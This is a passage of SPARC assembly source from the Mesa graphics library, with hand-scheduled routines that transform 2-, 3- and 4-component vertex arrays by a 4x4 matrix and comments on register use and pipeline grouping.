ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points2_general
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0+y*M4+M12, x*M1+y*M5+M13,
!                          x*M2+y*M6+M14, x*M3+y*M7+M15).
! Regs: %g1 src, %g2 dest (0x10 bytes/element), %g3 count, %o5 stride,
! %o1 loop counter.  Not unrolled; one point per iteration.
.globl _mesa_sparc_transform_points2_general
_mesa_sparc_transform_points2_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f0, M2, %f4 ! FGM Group
fmuls %f0, M3, %f5 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
fmuls %f1, M4, %f6 ! FGM
fadds %f3, M13, %f3 ! FGA Group f3 available
fmuls %f1, M5, %f7 ! FGM
fadds %f4, M14, %f4 ! FGA Group f4 available
fmuls %f1, M6, %f8 ! FGM
fadds %f5, M15, %f5 ! FGA Group f5 available
fmuls %f1, M7, %f9 ! FGM
fadds %f2, %f6, %f2 ! FGA Group f6 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f7 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f8 available
st %f4, [%g2 + 0x08] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f9 available
st %f5, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points2_identity
! In: %o0 = dest vector, %o1 = matrix (unused), %o2 = source vector.
! Copies (x,y) of each point unchanged.  If source and dest are the same
! vector object (%o2 == %o0) there is nothing to do: plain retl at 3:.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points2_identity
_mesa_sparc_transform_points2_identity:
cmp %o2, %o0 ! in-place? then no copy needed
be 3f
ld [%o2 + V4F_STRIDE], %o5 ! delay slot (harmless either way)
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
add %o1, 1, %o1 ! IEU0
ld [%g1 + 0x04], %f1 ! LSU Group
add %g1, %o5, %g1 ! IEU0
cmp %o1, %g3 ! IEU1
st %f0, [%g2 + 0x00] ! LSU Group
st %f1, [%g2 + 0x04] ! LSU Group
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0
2:
ba __set_v4f_2 ! tail-call: set dest size/flags to 2
nop
3: retl
nop
! _mesa_sparc_transform_points2_2d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0+y*M4+M12, x*M1+y*M5+M13).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride,
! %o2 reused as even loop bound (count & ~1), %o1 loop counter.
! Loop 1: unrolled x2 (second point in f8/f9..f13); 2: handles leftover.
.globl _mesa_sparc_transform_points2_2d
_mesa_sparc_transform_points2_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2 ! delay slot: even loop bound
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x00], %f8 ! LSU Group
fmuls %f0, M1, %f3 ! FGM
ld [%g1 + 0x04], %f9 ! LSU Group
fmuls %f1, M4, %f6 ! FGM
fmuls %f1, M5, %f7 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f8, M0, %f10 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f8, M1, %f11 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fmuls %f9, M4, %f12 ! FGM Group
fmuls %f9, M5, %f13 ! FGM Group
fadds %f10, M12, %f10 ! FGA Group f2, f10 available
fadds %f2, %f6, %f2 ! FGA Group f3, f11 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f11, M13, %f11 ! FGA Group f12 available
fadds %f3, %f7, %f3 ! FGA Group f13 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f10, %f12, %f10 ! FGA Group f10 available
st %f10, [%g2 + 0x10] ! LSU
fadds %f11, %f13, %f11 ! FGA Group f11 available
st %f11, [%g2 + 0x14] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
fadds %f3, M13, %f3 ! FGA Group f3 available
fadds %f2, %f6, %f2 ! FGA Group 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
3:
ba __set_v4f_2 ! tail-call: set dest size/flags to 2
nop
! _mesa_sparc_transform_points2_2d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0+M12, y*M5+M13) — scale + translate only.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride,
! %o2 reused as even loop bound (count & ~1), %o1 loop counter.
! Loop 1: unrolled x2; 2: handles the odd leftover point.
.globl _mesa_sparc_transform_points2_2d_no_rot
_mesa_sparc_transform_points2_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2 ! delay slot: even loop bound
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f4 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f5 ! LSU Group
fmuls %f1, M5, %f3 ! FGM
fmuls %f4, M0, %f6 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f5, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f6, M12, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x10] ! LSU
fadds %f7, M13, %f7 ! FGA Group f7 available
st %f7, [%g2 + 0x14] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f1, M5, %f3 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group, 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
3:
ba __set_v4f_2 ! tail-call: set dest size/flags to 2
nop
/* orig: 12 cycles */
! _mesa_sparc_transform_points2_3d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0+y*M4+M12, x*M1+y*M5+M13, x*M2+y*M6+M14).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride,
! %o2 reused as even loop bound (count & ~1), %o1 loop counter.
! Loop 1: unrolled x2; 2: handles the odd leftover point.
! FIX: the V4F_START pointer loads now use LDPTR like every sibling
! routine in this file; a plain 32-bit `ld` would truncate the pointer
! on sparc64 (LDPTR expands to `ld` on 32-bit, so behavior there is
! unchanged).
.globl _mesa_sparc_transform_points2_3d
_mesa_sparc_transform_points2_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o1
be 2f
andn %g3, 1, %o2 ! delay slot: even loop bound
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o1, 2, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f9 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f10 ! LSU Group
fmuls %f0, M1, %f3 ! FGM
fmuls %f0, M2, %f4 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f1, M6, %f8 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fmuls %f9, M0, %f11 ! FGM Group f4 available
fadds %f4, M14, %f4 ! FGA
fmuls %f9, M1, %f12 ! FGM Group f6 available
fmuls %f9, M2, %f13 ! FGM Group f2, f7 available
fadds %f2, %f6, %f2 ! FGA
st %f2, [%g2 + 0x00] ! LSU
fmuls %f10, M4, %f14 ! FGM Group f3, f8 available
fadds %f3, %f7, %f3 ! FGA
st %f3, [%g2 + 0x04] ! LSU
fmuls %f10, M5, %f15 ! FGM Group f4, f11 available
fadds %f11, M12, %f11 ! FGA
fmuls %f10, M6, %f0 ! FGM Group f12 available
fadds %f12, M13, %f12 ! FGA
fadds %f13, M14, %f13 ! FGA Group f13 available
fadds %f4, %f8, %f4 ! FGA Group f14 available
st %f4, [%g2 + 0x08] ! LSU
fadds %f11, %f14, %f11 ! FGA Group f15, f11 available
st %f11, [%g2 + 0x10] ! LSU
fadds %f12, %f15, %f12 ! FGA Group f0, f12 available
st %f12, [%g2 + 0x14] ! LSU
fadds %f13, %f0, %f13 ! FGA Group f13 available
st %f13, [%g2 + 0x18] ! LSU
cmp %o1, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o1, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f0, M1, %f3 ! FGM Group
fmuls %f0, M2, %f4 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group f2 available
fadds %f2, M12, %f2 ! FGA
fmuls %f1, M6, %f8 ! FGM Group f3 available
fadds %f3, M13, %f3 ! FGA
fadds %f4, M14, %f4 ! FGA Group f4 available
fadds %f2, %f6, %f2 ! FGA Group stall, f2, f6, f7 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, %f7, %f3 ! FGA Group f3, f8 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x08] ! LSU
3:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points2_3d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0+M12, y*M5+M13, M14).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o2 = count & ~1.
! NOTE: %o3 (not %o1) is the loop counter here so that %o1 still holds
! the matrix pointer at 3:, where m[14] is reloaded to pick the result
! size: nonzero translation in z -> size 3, else size 2.
.globl _mesa_sparc_transform_points2_3d_no_rot
_mesa_sparc_transform_points2_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13_14(%o1)
cmp %g3, 1
st %g3, [%o0 + V4F_COUNT]
bl 3f
clr %o3
be 2f
andn %g3, 1, %o2 ! delay slot: even loop bound
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
add %o3, 2, %o3 ! IEU0
add %g1, %o5, %g1 ! IEU1
ld [%g1 + 0x00], %f4 ! LSU Group
fmuls %f0, M0, %f2 ! FGM
ld [%g1 + 0x04], %f5 ! LSU Group
fmuls %f1, M5, %f3 ! FGM
fmuls %f4, M0, %f6 ! FGM Group
add %g1, %o5, %g1 ! IEU0
fmuls %f5, M5, %f7 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
fadds %f6, M12, %f6 ! FGA Group f6 available
st M14, [%g2 + 0x08] ! LSU
fadds %f7, M13, %f7 ! FGA Group f7 available
st %f6, [%g2 + 0x10] ! LSU
st %f7, [%g2 + 0x14] ! LSU Group
st M14, [%g2 + 0x18] ! LSU Group
cmp %o3, %o2 ! IEU1
bne 1b ! CTI
add %g2, 0x20, %g2 ! IEU0 Group
cmp %o3, %g3
be 3f
nop
2: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
fmuls %f0, M0, %f2 ! FGM Group
fmuls %f1, M5, %f3 ! FGM Group
fadds %f2, M12, %f2 ! FGA Group, 2 cycle stall, f2 available
st %f2, [%g2 + 0x00] ! LSU
fadds %f3, M13, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x04] ! LSU
st M14, [%g2 + 0x08] ! LSU Group
3: ld [%o1 + (14 * 0x4)], %g3 ! reload raw m[14] bits from matrix
cmp %g3, 0 ! integer compare of the float bits
bne __set_v4f_3 ! z translation present -> size 3
nop
ba __set_v4f_2 ! m[14] == +0.0 -> size 2
nop
! _mesa_sparc_transform_points2_perspective
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y): dest = (x*M0, y*M5, M14, 0.0); the 0.0 comes from
! storing %g0 (zero bit pattern == IEEE 0.0f).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points2_perspective
_mesa_sparc_transform_points2_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
add %o1, 1, %o1
add %g1, %o5, %g1
fmuls %f0, M0, %f2
st %f2, [%g2 + 0x00]
fmuls %f1, M5, %f3
st %f3, [%g2 + 0x04]
st M14, [%g2 + 0x08]
st %g0, [%g2 + 0x0c]
cmp %o1, %g3
bne 1b
add %g2, 0x10, %g2 ! delay slot: advance dest
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points3_general
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+y*M4+z*M8 +M12,
!                            x*M1+y*M5+z*M9 +M13,
!                            x*M2+y*M6+z*M10+M14,
!                            x*M3+y*M7+z*M11+M15).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_general
_mesa_sparc_transform_points3_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_8_9_10_11_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M4, %f7 ! FGM Group
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M5, %f8 ! FGM Group
fmuls %f0, M2, %f5 ! FGM Group f3 available
fmuls %f1, M6, %f9 ! FGM Group f7 available
fadds %f3, %f7, %f3 ! FGA
fmuls %f0, M3, %f6 ! FGM Group f4 available
fmuls %f1, M7, %f10 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fmuls %f2, M8, %f7 ! FGM Group f5 available
fmuls %f2, M9, %f8 ! FGM Group f9,f3 available
fadds %f5, %f9, %f5 ! FGA
fmuls %f2, M10, %f9 ! FGM Group f6 available
fadds %f6, %f10, %f6 ! FGA Group f10,f4 available
fmuls %f2, M11, %f10 ! FGM
fadds %f3, M12, %f3 ! FGA Group f7 available
fadds %f4, M13, %f4 ! FGA Group f8,f5 available
fadds %f5, M14, %f5 ! FGA Group f9 available
fadds %f6, M15, %f6 ! FGA Group f10,f6 available
fadds %f3, %f7, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f8, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x08] ! LSU
fadds %f6, %f10, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points3_identity
! In: %o0 = dest vector, %o1 = matrix (unused), %o2 = source vector.
! Copies (x,y,z) of each point unchanged.  Unlike points2_identity,
! there is no %o2 == %o0 early-out here.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_identity
_mesa_sparc_transform_points3_identity:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
add %o1, 1, %o1
add %g1, %o5, %g1
cmp %o1, %g3
st %f0, [%g2 + 0x00]
st %f1, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
bne 1b
add %g2, 0x10, %g2 ! delay slot: advance dest
2:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points3_2d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+y*M4+M12, x*M1+y*M5+M13, z);
! z passes through untransformed (stored straight from %f2).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_2d
_mesa_sparc_transform_points3_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fadds %f3, M12, %f3 ! FGA Group f3 available
fadds %f4, M13, %f4 ! FGA Group f4 available
fadds %f3, %f6, %f3 ! FGA Group f6 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f7, %f4 ! FGA Group f7 available
st %f4, [%g2 + 0x04] ! LSU
st %f2, [%g2 + 0x08] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points3_2d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+M12, y*M5+M13, z); z passes through.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_2d_no_rot
_mesa_sparc_transform_points3_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M5, %f4 ! FGM Group
st %f2, [%g2 + 0x08] ! LSU
fadds %f3, M12, %f3 ! FGA Group
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group
st %f4, [%g2 + 0x04] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points3_3d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+y*M4+z*M8 +M12,
!                            x*M1+y*M5+z*M9 +M13,
!                            x*M2+y*M6+z*M10+M14).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_3d
_mesa_sparc_transform_points3_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_4_5_6_8_9_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M4, %f6 ! FGM Group
fmuls %f0, M1, %f4 ! FGM Group
fmuls %f1, M5, %f7 ! FGM Group
fmuls %f0, M2, %f5 ! FGM Group f3 available
fmuls %f1, M6, %f8 ! FGM Group f6 available
fadds %f3, %f6, %f3 ! FGA
fmuls %f2, M8, %f9 ! FGM Group f4 available
fmuls %f2, M9, %f10 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
fmuls %f2, M10, %f11 ! FGM Group f5 available
fadds %f5, %f8, %f5 ! FGA Group f8, f3 available
fadds %f3, %f9, %f3 ! FGA Group f9 available
fadds %f4, %f10, %f4 ! FGA Group f10, f4 available
fadds %f5, %f11, %f5 ! FGA Group stall, f11, f5 available
fadds %f3, M12, %f3 ! FGA Group f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x08] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points3_3d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+M12, y*M5+M13, z*M10+M14).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
! The loop-exit compare is hoisted up (cmp %o1,%g3 right after the
! increment) so only the bne/delay-slot pair remains at the bottom.
.globl _mesa_sparc_transform_points3_3d_no_rot
_mesa_sparc_transform_points3_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
cmp %o1, %g3 ! IEU1 Group
fmuls %f0, M0, %f3 ! FGM
fmuls %f1, M5, %f4 ! FGM Group
fmuls %f2, M10, %f5 ! FGM Group
fadds %f3, M12, %f3 ! FGA Group, stall, f3 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, M13, %f4 ! FGA Group, f4 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group, f5 available
st %f5, [%g2 + 0x08] ! LSU
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_3 ! tail-call: set dest size/flags to 3
nop
! _mesa_sparc_transform_points3_perspective
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z): dest = (x*M0+z*M8, y*M5+z*M9, z*M10+M14, -z);
! the w output is -z via fnegs.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points3_perspective
_mesa_sparc_transform_points3_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_8_9_10_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f3 ! FGM
fmuls %f2, M8, %f6 ! FGM Group
fmuls %f1, M5, %f4 ! FGM Group
fmuls %f2, M9, %f7 ! FGM Group
fmuls %f2, M10, %f5 ! FGM Group f3 available
fadds %f3, %f6, %f3 ! FGA Group f6 available
st %f3, [%g2 + 0x00] ! LSU
fadds %f4, %f7, %f4 ! FGA Group stall, f4, f7 available
st %f4, [%g2 + 0x04] ! LSU
fadds %f5, M14, %f5 ! FGA Group
st %f5, [%g2 + 0x08] ! LSU
fnegs %f2, %f6 ! FGA Group: w = -z
st %f6, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_general
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Full 4x4 transform per point (x,y,z,w):
!   dest = x*(M0..M3) + y*(M4..M7) + z*(M8..M11) + w*(M12..M15).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_general
_mesa_sparc_transform_points4_general:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_3_4_5_6_7_8_9_10_11_12_13_14_15(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM Group
fmuls %f1, M4, %f8 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f9 ! FGM Group
fmuls %f0, M2, %f6 ! FGM Group f4 available
